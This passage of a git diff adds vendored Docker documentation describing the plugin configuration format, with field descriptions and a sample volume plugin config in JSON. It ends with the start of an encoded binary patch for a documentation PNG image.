+     another repository, consider it read-only there, as it will
+     periodically be overwritten by the definitive file. Pull
+     requests which include edits to this file in other repositories
+     will be rejected.
+-->
+
+
+# Plugin Config Version 1 of Plugin V2
+
+This document outlines the format of the V0 plugin configuration. The plugin
+config described herein was introduced in the Docker daemon in the [v1.12.0
+release](https://github.com/docker/docker/commit/f37117045c5398fd3dca8016ea8ca0cb47e7312b).
+
+Plugin configs describe the various constituents of a docker plugin. Plugin
+configs can be serialized to JSON format with the following media types:
+
+Config Type  | Media Type
+------------- | -------------
+config  | "application/vnd.docker.plugin.v1+json"
+
+
+## *Config* Field Descriptions
+
+Config provides the base accessible fields for working with V0 plugin format
+ in the registry.
+
+- **`description`** *string*
+
+	description of the plugin
+
+- **`documentation`** *string*
+
+  	link to the documentation about the plugin
+
+- **`interface`** *PluginInterface*
+
+   interface implemented by the plugins, struct consisting of the following fields
+
+    - **`types`** *string array*
+
+      types indicate what interface(s) the plugin currently implements.
+
+      currently supported:
+
+      	- **docker.volumedriver/1.0**
+
+      	- **docker.authz/1.0**
+
+    - **`socket`** *string*
+
+      socket is the name of the socket the engine should use to communicate with the plugins.
+      the socket will be created in `/run/docker/plugins`.
+
+
+- **`entrypoint`** *string array*
+
+   entrypoint of the plugin, see [`ENTRYPOINT`](../reference/builder.md#entrypoint)
+
+- **`workdir`** *string*
+
+   workdir of the plugin, see [`WORKDIR`](../reference/builder.md#workdir)
+
+- **`network`** *PluginNetwork*
+
+   network of the plugin, struct consisting of the following fields
+
+    - **`type`** *string*
+
+      network type.
+
+      currently supported:
+
+      	- **bridge**
+      	- **host**
+      	- **none**
+
+- **`mounts`** *PluginMount array*
+
+   mount of the plugin, struct consisting of the following fields, see [`MOUNTS`](https://github.com/opencontainers/runtime-spec/blob/master/config.md#mounts)
+
+    - **`name`** *string*
+
+	  name of the mount.
+
+    - **`description`** *string*
+
+      description of the mount.
+
+    - **`source`** *string*
+
+	  source of the mount.
+
+    - **`destination`** *string*
+
+	  destination of the mount.
+
+    - **`type`** *string*
+
+      mount type.
+
+    - **`options`** *string array*
+
+	  options of the mount.
+
+- **`propagatedMount`** *string*
+
+   path to be mounted as rshared, so that mounts under that path are visible to docker. This is useful for volume plugins.
+   This path will be bind-mounted outisde of the plugin rootfs so it's contents
+   are preserved on upgrade.
+
+- **`env`** *PluginEnv array*
+
+   env of the plugin, struct consisting of the following fields
+
+    - **`name`** *string*
+
+	  name of the env.
+
+    - **`description`** *string*
+
+      description of the env.
+
+    - **`value`** *string*
+
+	  value of the env.
+
+- **`args`** *PluginArgs*
+
+   args of the plugin, struct consisting of the following fields
+
+    - **`name`** *string*
+
+	  name of the args.
+
+    - **`description`** *string*
+
+      description of the args.
+
+    - **`value`** *string array*
+
+	  values of the args.
+
+- **`linux`** *PluginLinux*
+
+    - **`capabilities`** *string array*
+
+          capabilities of the plugin (*Linux only*), see list [`here`](https://github.com/opencontainers/runc/blob/master/libcontainer/SPEC.md#security)
+
+    - **`allowAllDevices`** *boolean*
+
+	If `/dev` is bind mounted from the host, and allowAllDevices is set to true, the plugin will have `rwm` access to all devices on the host.
+
+    - **`devices`** *PluginDevice array*
+
+          device of the plugin, (*Linux only*), struct consisting of the following fields, see [`DEVICES`](https://github.com/opencontainers/runtime-spec/blob/master/config-linux.md#devices)
+
+          - **`name`** *string*
+
+	      name of the device.
+
+          - **`description`** *string*
+
+              description of the device.
+
+          - **`path`** *string*
+
+              path of the device.
+
+## Example Config
+
+*Example showing the 'tiborvass/sample-volume-plugin' plugin config.*
+
+```json
+{
+            "Args": {
+                "Description": "",
+                "Name": "",
+                "Settable": null,
+                "Value": null
+            },
+            "Description": "A sample volume plugin for Docker",
+            "Documentation": "https://docs.docker.com/engine/extend/plugins/",
+            "Entrypoint": [
+                "/usr/bin/sample-volume-plugin",
+                "/data"
+            ],
+            "Env": [
+                {
+                    "Description": "",
+                    "Name": "DEBUG",
+                    "Settable": [
+                        "value"
+                    ],
+                    "Value": "0"
+                }
+            ],
+            "Interface": {
+                "Socket": "plugin.sock",
+                "Types": [
+                    "docker.volumedriver/1.0"
+                ]
+            },
+            "Linux": {
+                "Capabilities": null,
+                "AllowAllDevices": false,
+                "Devices": null
+            },
+            "Mounts": null,
+            "Network": {
+                "Type": ""
+            },
+            "PropagatedMount": "/data",
+            "User": {},
+            "Workdir": ""
+}
+```
diff --git a/vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png b/vendor/github.com/docker/docker/docs/extend/images/authz_additional_info.png
new file mode 100644
index 0000000000000000000000000000000000000000..1a6a6d01d2048fcb975b7d2b025cdfabd4c4f5f3
GIT binary patch
literal 45916
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
